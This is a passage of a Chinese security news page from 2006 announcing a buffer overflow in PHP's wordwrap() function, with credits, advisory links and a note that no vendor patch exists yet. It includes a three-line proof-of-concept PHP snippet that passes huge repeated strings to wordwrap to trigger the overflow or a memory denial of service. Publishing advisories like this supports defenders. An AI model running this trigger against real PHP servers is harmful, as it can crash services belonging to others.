漏洞公布：PHP wordwrap()缓冲区溢出

作者：xiaoliu 来源：安全中国添加时间：2006-5-26 13:19:55

如果memory_limit的值过高，还可能导致内存拒绝服务。

　　<*来源：Leon Juranic （ljuranic@LSS.hr）

　　链接：http://secunia.com/advisories/19803/print/

　　 http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-04-02

　　*>

　　测试方法：

　　警告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

　　
　　$a = str_repeat ("A",438013);

　　$b = str_repeat ("B",951140);

　　wordwrap ($a,0,$b,0);

　　?>

　　建议：

　　厂商补丁：

　　PHP

　　目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

　　http://www.php.net
(e129)

第 2 页，共 2 页 [1] [2]

上一篇：下一代Windows命令行命名PowerShell
下一篇：芬兰研究人员称多种DNS管理软件有漏洞

站内搜索